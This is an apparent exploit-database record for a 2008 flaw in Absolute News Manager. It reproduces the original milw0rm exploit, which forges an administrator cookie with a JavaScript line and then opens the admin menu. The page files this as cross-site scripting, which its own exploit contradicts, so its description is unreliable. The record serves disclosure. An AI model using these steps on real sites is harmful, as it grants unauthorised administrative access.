Absolute News Manager

vendor:

by:

Hakxer

7.5

CVSS

HIGH

Cross-Site Scripting

CWE

Product Name: Absolute News Manager

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

A Cross-Site Scripting vulnerability was discovered in Absolute News Manager. An attacker can exploit this vulnerability to inject malicious JavaScript code into the application, which will be executed in the browser of a user when the malicious page is loaded.

Mitigation:

Input validation should be used to detect and reject malicious input.

Source

Exploit-DB raw data:

#################################################################################
## Discovered by : Hakxer                                                       #
## Script : Absolute News Manager :http://www.xigla.com/absolutenmnet/demo.htm  #
## Greetz : Allah , Egyptian x Hacker , SQL_Inj4ct0r , Stealth , All my team    #
## Team : EgY Coders Team                                                       #
## ----------------------------Start Exploit----------------------------------- #
## First Go to http://www.xigla.com/absolutenmnet/demo/login.aspx
## Execute JS Code : javascript:document.cookie="xlaANMadmin_demo=usr=1&lvl=2&uniqueid=&permissions=upload,relate";
## Second Go to http://www.xigla.com/absolutenmnet/demo/menu.aspx
## _=END=_
#############################################################################

# milw0rm.com [2008-10-31]